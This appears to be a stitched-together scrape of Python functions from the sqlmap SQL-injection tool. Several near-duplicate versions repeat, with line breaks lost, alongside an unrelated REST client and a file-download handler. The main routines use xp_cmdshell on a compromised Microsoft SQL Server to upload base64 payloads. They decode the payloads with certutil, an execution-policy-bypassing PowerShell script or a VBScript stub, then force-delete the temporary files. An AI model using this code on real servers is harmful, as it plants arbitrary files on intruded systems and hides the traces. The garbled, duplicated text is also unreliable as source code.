def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType): infoMsg = "using certutil.exe to write the %s " % fileType infoMsg += "file content to file '%s', please wait.." % dFile logger.info(infoMsg) chunkMaxSize = 500 randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFilePath = "%s\%s" % (tmpPath, randFile) encodedFileContent = base64encode(wFileContent) splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile) logger.debug("decoding the file to %s.." % dFile) commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile), "del /F /Q %s" % randFile) complComm = " & ".join(command for command in commands) self.execCmd(complComm)
def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType): infoMsg = "using certutil.exe to write the %s " % fileType infoMsg += "file content to file '%s', please wait.." % dFile logger.info(infoMsg) chunkMaxSize = 500 randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFilePath = "%s\%s" % (tmpPath, randFile) encodedFileContent = base64encode(wFileContent) splittedEncodedFileContent = '\n'.join([ encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize) ]) logger.debug( "uploading the file base64-encoded content to %s, please wait.." % randFilePath) self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile) logger.debug("decoding the file to %s.." % dFile) commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile), "del /F /Q %s" % randFile) complComm = " & ".join(command for command in commands) self.execCmd(complComm)
def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType): infoMsg = "using PowerShell to write the %s file content " % fileType #infoMsg += "to file '%s', please wait.." % dFile infoMsg += "to file '%s'" % dFile logger.info(infoMsg) randPSScript = "tmpf%s.ps1" % randomStr(lowercase=True) randPSScriptPath = "%s\%s" % (tmpPath, randPSScript) encodedFileContent = base64encode(wFileContent) #psString = "[System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(\"%s\")) | Out-File \"%s\"" % (encodedFileContent, dFile) psString = "[System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(\"%s\")) ^> \"%s\"" % (encodedFileContent, dFile) logger.debug("uploading the PowerShell script to %s, please wait.." % randPSScriptPath) self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) logger.debug("executing the PowerShell script to write the %s file" % dFile) self.execCmd("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath)
def _client(url, options=None): logger.debug("Calling '%s'" % url) try: data = None if options is not None: data = jsonize(options) headers = {"Content-Type": "application/json"} if DataStore.username or DataStore.password: headers["Authorization"] = "Basic %s" % base64encode("%s:%s" % (DataStore.username or "", DataStore.password or "")) req = _urllib.request.Request(url, data, headers) response = _urllib.request.urlopen(req) text = response.read() except: if options: logger.error("Failed to load and parse %s" % url) raise return text
def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType): infoMsg = "using PowerShell to write the %s file content " % fileType infoMsg += "to file '%s'" % dFile logger.info(infoMsg) encodedFileContent = base64encode(wFileContent) encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) encodedBase64FilePath = "%s\%s" % (tmpPath, encodedBase64File) randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) randPSScriptPath = "%s\%s" % (tmpPath, randPSScript) wFileSize = len(encodedFileContent) chunkMaxSize = 1024 logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath) for i in xrange(0, wFileSize, chunkMaxSize): wEncodedChunk = encodedFileContent[i:i + chunkMaxSize] self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = " psString += "[System.Convert]::FromBase64String($Base64); Set-Content " psString += "-Path \"%s\" -Value $Content -Encoding Byte" % dFile logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath) self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) logger.debug( "executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile) commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, "del /F /Q \"%s\"" % encodedBase64FilePath, "del /F /Q \"%s\"" % randPSScriptPath) complComm = " & ".join(command for command in commands) self.execCmd(complComm)
def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType): infoMsg = "using PowerShell to write the %s file content " % fileType infoMsg += "to file '%s'" % dFile logger.info(infoMsg) encodedFileContent = base64encode(wFileContent) encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File) randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript) wFileSize = len(encodedFileContent) chunkMaxSize = 1024 logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath) for i in xrange(0, wFileSize, chunkMaxSize): wEncodedChunk = encodedFileContent[i:i + chunkMaxSize] self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = " psString += "[System.Convert]::FromBase64String($Base64); Set-Content " psString += "-Path \"%s\" -Value $Content -Encoding Byte" % dFile logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath) self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile) commands = ( "powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, "del /F /Q \"%s\"" % encodedBase64FilePath, "del /F /Q \"%s\"" % randPSScriptPath ) self.execCmd(" & ".join(command for command in commands))
def download(taskid, target, filename): """ Download a certain file from the file system """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to download()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) path = os.path.abspath(os.path.join(paths.SQLMAP_OUTPUT_PATH, target, filename)) # Prevent file path traversal if not path.startswith(paths.SQLMAP_OUTPUT_PATH): logger.warning("[%s] Forbidden path (%s)" % (taskid, target)) return jsonize({"success": False, "message": "Forbidden path"}) if os.path.isfile(path): logger.debug("(%s) Retrieved content of file %s" % (taskid, target)) with open(path, 'rb') as inf: file_content = inf.read() return jsonize({"success": True, "file": base64encode(file_content)}) else: logger.warning("[%s] File does not exist %s" % (taskid, target)) return jsonize({"success": False, "message": "File does not exist"})
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): infoMsg = "using a custom visual basic script to write the " infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile) logger.info(infoMsg) randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFilePath = "%s\%s" % (tmpPath, randFile) vbs = """Dim inputFilePath, outputFilePath inputFilePath = "%s" outputFilePath = "%s" Set fs = CreateObject("Scripting.FileSystemObject") Set file = fs.GetFile(inputFilePath) If file.Size Then Wscript.Echo "Loading from: " & inputFilePath Wscript.Echo Set fd = fs.OpenTextFile(inputFilePath, 1) data = fd.ReadAll fd.Close data = Replace(data, " ", "") data = Replace(data, vbCr, "") data = Replace(data, vbLf, "") Wscript.Echo "Fixed Input: " Wscript.Echo data Wscript.Echo decodedData = base64_decode(data) Wscript.Echo "Output: " Wscript.Echo decodedData Wscript.Echo Wscript.Echo "Writing output in: " & outputFilePath Wscript.Echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True) ofs.Write decodedData ofs.close Else Wscript.Echo "The file is empty." End If Function base64_decode(byVal strIn) Dim w1, w2, w3, w4, n, strOut For n = 1 To Len(strIn) Step 4 w1 = mimedecode(Mid(strIn, n, 1)) w2 = mimedecode(Mid(strIn, n + 1, 1)) w3 = mimedecode(Mid(strIn, n + 2, 1)) w4 = mimedecode(Mid(strIn, n + 3, 1)) If Not w2 Then _ strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) If Not w3 Then _ strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) If Not w4 Then _ strOut = strOut + Chr(((w3 * 64 + w4) And 255)) Next base64_decode = strOut End Function Function mimedecode(byVal strIn) Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" If Len(strIn) = 0 Then mimedecode = -1 : Exit Function Else mimedecode = InStr(Base64Chars, strIn) - 1 End If End Function""" % (randFilePath, dFile) vbs = vbs.replace(" ", "") encodedFileContent = base64encode(wFileContent) logger.debug( "uploading the file base64-encoded content to %s, please wait.." % randFilePath) self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) logger.debug( "uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs)) self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs, "del /F /Q %s" % randVbs, "del /F /Q %s" % randFile) complComm = " & ".join(command for command in commands) self.execCmd(complComm)
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): infoMsg = "using a custom visual basic script to write the " infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile) logger.info(infoMsg) randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFilePath = "%s\%s" % (tmpPath, randFile) vbs = """Dim inputFilePath, outputFilePath inputFilePath = "%s" outputFilePath = "%s" Set fs = CreateObject("Scripting.FileSystemObject") Set file = fs.GetFile(inputFilePath) If file.Size Then Wscript.Echo "Loading from: " & inputFilePath Wscript.Echo Set fd = fs.OpenTextFile(inputFilePath, 1) data = fd.ReadAll fd.Close data = Replace(data, " ", "") data = Replace(data, vbCr, "") data = Replace(data, vbLf, "") Wscript.Echo "Fixed Input: " Wscript.Echo data Wscript.Echo decodedData = base64_decode(data) Wscript.Echo "Output: " Wscript.Echo decodedData Wscript.Echo Wscript.Echo "Writing output in: " & outputFilePath Wscript.Echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True) ofs.Write decodedData ofs.close Else Wscript.Echo "The file is empty." End If Function base64_decode(byVal strIn) Dim w1, w2, w3, w4, n, strOut For n = 1 To Len(strIn) Step 4 w1 = mimedecode(Mid(strIn, n, 1)) w2 = mimedecode(Mid(strIn, n + 1, 1)) w3 = mimedecode(Mid(strIn, n + 2, 1)) w4 = mimedecode(Mid(strIn, n + 3, 1)) If Not w2 Then _ strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) If Not w3 Then _ strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) If Not w4 Then _ strOut = strOut + Chr(((w3 * 64 + w4) And 255)) Next base64_decode = strOut End Function Function mimedecode(byVal strIn) Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" If Len(strIn) = 0 Then mimedecode = -1 : Exit Function Else mimedecode = InStr(Base64Chars, strIn) - 1 End If End Function""" % (randFilePath, dFile) vbs = vbs.replace(" ", "") encodedFileContent = base64encode(wFileContent) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs)) self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs, "del /F /Q %s" % randVbs, "del /F /Q %s" % randFile) complComm = " & ".join(command for command in commands) self.execCmd(complComm)